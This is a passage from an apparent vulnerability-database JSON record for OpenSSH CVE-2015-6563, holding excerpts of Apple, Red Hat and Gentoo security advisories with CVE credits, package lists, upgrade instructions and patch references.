Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-5927 : Apple\nCVE-2015-5942\nCVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP\u0027s Zero\nDay Initiative\nCVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team\n\nFontParser\nAvailable for: OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team\n\nGrand Central Dispatch\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\nImpact: Processing a maliciously crafted package may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the handling of\ndispatch calls. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-6989 : Apple\n\nGraphics Drivers\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to cause unexpected system\ntermination or read kernel memory\nDescription: Multiple out of bounds read issues existed in the\nNVIDIA graphics driver. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-7019 : Ian Beer of Google Project Zero\nCVE-2015-7020 : Moony Li of Trend Micro\n\nGraphics Drivers\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-7021 : Moony Li of Trend Micro\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Processing a maliciously crafted image file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nparsing of image metadata. These issues were addressed through\nimproved metadata validation. \nCVE-ID\nCVE-2015-5935 : Apple\nCVE-2015-5938 : Apple\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Processing a maliciously crafted image file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nparsing of image metadata. These issues were addressed through\nimproved metadata validation. \nCVE-ID\nCVE-2015-5936 : Apple\nCVE-2015-5937 : Apple\nCVE-2015-5939 : Apple\n\nIOAcceleratorFamily\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in\nIOAcceleratorFamily. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-6996 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-6974 : Luca Todesco (@qwertyoruiop)\n\nKernel\nAvailable for: OS X Yosemite v10.10.5\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A type confusion issue existed in the validation of\nMach tasks. This issue was addressed through improved Mach task\nvalidation. \nCVE-ID\nCVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella\n\nKernel\nAvailable for: OS X El Capitan 10.11\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: An uninitialized memory issue existed in the kernel. \nThis issue was addressed through improved memory initialization. \nCVE-ID\nCVE-2015-6988 : The Brainy Code Scanner (m00nbsd)\n\nKernel\nAvailable for: OS X El Capitan 10.11\nImpact: A local application may be able to cause a denial of service\nDescription: An issue existed when reusing virtual memory. This\nissue was addressed through improved validation. \nCVE-ID\nCVE-2015-6994 : Mark Mentovai of Google Inc. \n\nlibarchive\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: An issue existed within the path validation logic for\nsymlinks. This issue was addressed through improved path\nsanitization. \nCVE-ID\nCVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer\n\nMCX Application Restrictions\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\nImpact: A developer-signed executable may acquire restricted\nentitlements\nDescription: An entitlement validation issue existed in Managed\nConfiguration. A developer-signed app could bypass restrictions on\nuse of restricted entitlements and elevate privileges. This issue was\naddressed through improved provisioning profile validation. \nCVE-ID\nCVE-2015-7016 : Apple\n\nNet-SNMP\nAvailable for: OS X El Capitan 10.11\nImpact: An attacker in a privileged network position may be able to\ncause a denial of service\nDescription: Multiple issues existed in netsnmp version 5.6. These\nissues were addressed by using patches affecting OS X from upstream. \nCVE-ID\nCVE-2012-6151\nCVE-2014-3565\n\nOpenGL\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in OpenGL. This issue\nwas addressed through improved memory handling. \nCVE-ID\nCVE-2015-5924 : Apple\n\nOpenSSH\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to conduct impersonation attacks\nDescription: A privilege separation issue existed in PAM support. \nThis issue was addressed with improved authorization checks. \nCVE-ID\nCVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH\n\nSandbox\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: An input validation issue existed when handling NVRAM\nparameters. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical\nInstitute, Apple\n\nScript Editor\nAvailable for: OS X El Capitan 10.11\nImpact: An attacker may trick a user into running arbitrary\nAppleScript\nDescription: In some circumstances, Script Editor did not ask for\nuser confirmation before executing AppleScripts. This issue was\naddressed by prompting for user confirmation before executing\nAppleScripts. \nCVE-ID\nCVE-2015-7007 : Joe Vennix of Rapid7\n\nSecurity\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: A double free issue existed in the handling of\nAtomicBufferedFile descriptors. This issue was addressed through\nimproved validation of AtomicBufferedFile descriptors. \nCVE-ID\nCVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey\nUlanov from the Chrome Team\n\nSecurityAgent\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application can programmatically control\nkeychain access prompts\nDescription: A method existed for applications to create synthetic\nclicks on keychain prompts. This was addressed by disabling synthetic\nclicks for keychain access windows. \nCVE-ID\nCVE-2015-5943\n\nInstallation note:\n\nOS X El Capitan v10.11.1 includes the security content of\nSafari 9.0.1: https://support.apple.com/kb/HT205377\n\nOS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJWJuKsAAoJEBcWfLTuOo7t8e0P/igVHKDXeLNib2eEzbS2BMVV\nEe968BgEDw1xnHK8zzh3bbRNxxAUT9lwe8RuSYECfp8sUYySb51/VIWpmidewsqB\naz7mJ4Gohldppejc5tykHDoTYesQL7iySLn74PdxZfZXbtz2EGJK19cA6hIHcO5x\nZiMCbJzTaAOylKRQRRi3kMdNWEzxbtm90247vNx/zMSjs1bhGlQbJsCVDmX/Q9uH\nXja9aPCHDfaQueTw5idbXwT+Y/+I9ytBlL5JXVrjRUDYCtuewC4DNsQxZY0qcDyE\nA7/0G7iYW5vOECNhpoLA0+1MbdHxJXhwJtmIKX8zucYqe/Vr4j41oGey/HJW55ER\nUSJ2RBpMtGhDEolyvxz7FlSPYOIpp05mwMB0GWQWAmkWDAxnagkQm9xwKBMt4eq4\nCNdI0YaX0iPPWYIkI3HpZHdzuwbE5b053cw1hLKc0OVQBiqLUQxe3W5s64ZqTSe0\nwhlm9lt/9EUwyfXHEiXTYi/d+CF8+JthY4ieXRJ4mwz77udafmgA5Pbl71SqB8pE\n7TBByuCOFdou6JmdJPahLDxoGRA+i7Z+a8Myn4WtbemkjrO9iZ/VsdAdl/Db+7cz\nrEgSPjelEC5z5WxQspiuohxU1NkDnMgWm2Tnx+pFBOfZMheE4xnTfve3vqY+gQdN\n4GbuRXld4PbxeDdel0Nk\n=snJ4\n-----END PGP SIGNATURE-----\n. 6) - i386, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* It was found that the OpenSSH client did not properly enforce the\nForwardX11Timeout setting. A malicious or compromised remote X application\ncould possibly use this flaw to establish a trusted connection to the local\nX server, even if only untrusted X11 forwarding was requested. (CVE-2015-6564)\n\n* An access flaw was discovered in OpenSSH; the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2088-06\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2088.html\nIssue date: 2015-11-19\nCVE Names: CVE-2015-5600 CVE-2015-6563 CVE-2015-6564 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix multiple security issues, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. These\npackages include the core files necessary for both the OpenSSH client and\nserver. \n\nA flaw was found in the way OpenSSH handled PAM authentication when using\nprivilege separation. An attacker with valid credentials on the system and\nable to fully compromise a non-privileged pre-authentication process using\na different flaw could use this flaw to authenticate as other users. \n(CVE-2015-6563)\n\nA use-after-free flaw was found in OpenSSH. (CVE-2015-6564)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. (CVE-2015-5600)\n\nIt was found that the OpenSSH ssh-agent, a program to hold private keys\nused for public key authentication, was vulnerable to password guessing\nattacks. An attacker able to connect to the agent could use this flaw to\nconduct a brute-force attack to unlock keys in the ssh-agent. (BZ#1238238)\n\nThis update fixes the following bugs:\n\n* Previously, the sshd_config(5) man page was misleading and could thus\nconfuse the user. This update improves the man page text to clearly\ndescribe the AllowGroups feature. (BZ#1150007)\n\n* The limit for the function for restricting the number of files listed\nusing the wildcard character (*) that prevents the Denial of Service (DoS)\nfor both server and client was previously set too low. Consequently, the\nuser reaching the limit was prevented from listing a directory with a large\nnumber of files over Secure File Transfer Protocol (SFTP). This update\nincreases the aforementioned limit, thus fixing this bug. (BZ#1160377)\n\n* When the ForceCommand option with a pseudoterminal was used and the\nMaxSession option was set to \"2\", multiplexed SSH connections did not work\nas expected. After the user attempted to open a second multiplexed\nconnection, the attempt failed if the first connection was still open. This\nupdate modifies OpenSSH to issue only one audit message per session, and\nthe user is thus able to open two multiplexed connections in this\nsituation. (BZ#1199112)\n\n* The ssh-copy-id utility failed if the account on the remote server did\nnot use an sh-like shell. Remote commands have been modified to run in an\nsh-like shell, and ssh-copy-id now works also with non-sh-like shells. \n(BZ#1201758)\n\n* Due to a race condition between auditing messages and answers when using\nControlMaster multiplexing, one session in the shared connection randomly\nand unexpectedly exited the connection. This update fixes the race\ncondition in the auditing code, and multiplexing connections now work as\nexpected even with a number of sessions created at once. (BZ#1240613)\n\nIn addition, this update adds the following enhancements:\n\n* As not all Lightweight Directory Access Protocol (LDAP) servers possess\na default schema, as expected by the ssh-ldap-helper program, this update\nprovides the user with an ability to adjust the LDAP query to get public\nkeys from servers with a different schema, while the default functionality\nstays untouched. (BZ#1201753)\n\n* With this enhancement update, the administrator is able to set\npermissions for files uploaded using Secure File Transfer Protocol (SFTP). \n(BZ#1197989)\n\n* This update provides the LDAP schema in LDAP Data Interchange Format\n(LDIF) format as a complement to the old schema previously accepted\nby OpenLDAP. (BZ#1184938)\n\n* With this update, the user can selectively disable the Generic Security\nServices API (GSSAPI) key exchange algorithms as any normal key exchange. \n(BZ#1253062)\n\nUsers of openssh are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1125110 - pam_namespace usage is not consistent across system-wide PAM configuration\n1160377 - sftp is failing using wildcards and many files\n1178116 - Default selinux policy prevents ssh-ldap-helper from connecting to LDAP server\n1181591 - No Documentation= line in the sshd.service file\n1184938 - Provide LDIF version of LPK schema\n1187597 - sshd -T does not show all (default) options, inconsistency\n1197666 - ssh client using HostbasedAuthentication aborts in FIPS mode\n1197989 - RFE: option to let openssh/sftp force the exact permissions on newly uploaded files\n1238238 - openssh: weakness of agent locking (ssh-add -x) to password guessing\n1245969 - CVE-2015-5600 openssh: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices\n1252844 - CVE-2015-6563 openssh: Privilege separation weakness related to PAM support\n1252852 - CVE-2015-6564 openssh: Use-after-free bug related to PAM support\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\naarch64:\nopenssh-6.6.1p1-22.el7.aarch64.rpm\nopenssh-clients-6.6.1p1-22.el7.aarch64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm\nopenssh-keycat-6.6.1p1-22.el7.aarch64.rpm\nopenssh-server-6.6.1p1-22.el7.aarch64.rpm\n\nppc64:\nopenssh-6.6.1p1-22.el7.ppc64.rpm\nopenssh-askpass-6.6.1p1-22.el7.ppc64.rpm\nopenssh-clients-6.6.1p1-22.el7.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm\nopenssh-keycat-6.6.1p1-22.el7.ppc64.rpm\nopenssh-server-6.6.1p1-22.el7.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-askpass-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-clients-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-keycat-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-server-6.6.1p1-22.el7.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-22.el7.s390x.rpm\nopenssh-askpass-6.6.1p1-22.el7.s390x.rpm\nopenssh-clients-6.6.1p1-22.el7.s390x.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.s390x.rpm\nopenssh-keycat-6.6.1p1-22.el7.s390x.rpm\nopenssh-server-6.6.1p1-22.el7.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nopenssh-askpass-6.6.1p1-22.el7.aarch64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm\nopenssh-ldap-6.6.1p1-22.el7.aarch64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.aarch64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.aarch64.rpm\n\nppc64:\nopenssh-debuginfo-6.6.1p1-22.el7.ppc.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm\nopenssh-ldap-6.6.1p1-22.el7.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-ldap-6.6.1p1-22.el7.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-22.el7.s390.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.s390x.rpm\nopenssh-ldap-6.6.1p1-22.el7.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.s390.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-22.el7.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-22.el7.x86_64.rpm\nopenssh-askpass-6.6.1p1-22.el7.x86_64.rpm\nopenssh-clients-6.6.1p1-22.el7.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-keycat-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-6.6.1p1-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-22.el7.i686.rpm\nopenssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm\nopenssh-ldap-6.6.1p1-22.el7.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm\npam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5600\nhttps://access.redhat.com/security/cve/CVE-2015-6563\nhttps://access.redhat.com/security/cve/CVE-2015-6564\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWTj/BXlSAg2UNWIIRAgIEAJ4+Nlu4NsYtiDloNVrVn2F/vT/9kACdEHqE\nh3XwDOy3+OSs/h1DEpVBtV0=\n=x/s+\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201512-04\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSH: Multiple vulnerabilities\n Date: December 20, 2015\n Bugs: #553724, #555518, #557340\n ID: 201512-04\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSH, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\n\n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-6.9_p1-r2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-5352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352\n[ 2 ] CVE-2015-5600\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600\n[ 3 ] CVE-2015-6563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563\n[ 4 ] CVE-2015-6564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564\n[ 5 ] CVE-2015-6565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201512-04\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "BID", "id": "76317" }, { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-6563", "trust": 3.3 }, { "db": "BID", "id": "76317", "trust": 2.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/08/22/1", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU92655282", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-004403", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201508-504", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201508-115", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-84524", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-6563", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134055", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136959", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134475", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135009", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "id": "VAR-201508-0112", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-84524" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T11:26:42.941000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/oct/msg00005.html" }, { "title": "HT205375", "trust": 0.8, "url": "https://support.apple.com/en-us/ht205375" }, { "title": "HT205375", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht205375" }, { "title": "Don\u0027t resend username to PAM; it already has it.", "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b" }, { "title": "release-7.0", "trust": 0.8, "url": "http://www.openssh.com/txt/release-7.0" }, { "title": "OpenSSH sshd monitor Fixes for component input validation vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=90847" }, { "title": "Red Hat: Moderate: openssh security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152088 - security advisory" }, { "title": "Red Hat: CVE-2015-6563", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-6563" }, { "title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-6563 CVE-2015-6564", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=73eb91ff53511af2767cd29878bd74dc" }, { "title": "Amazon Linux AMI: ALAS-2015-592", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-592" }, { "title": "Amazon Linux AMI: ALAS-2015-625", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-625" }, { "title": "Symantec Security 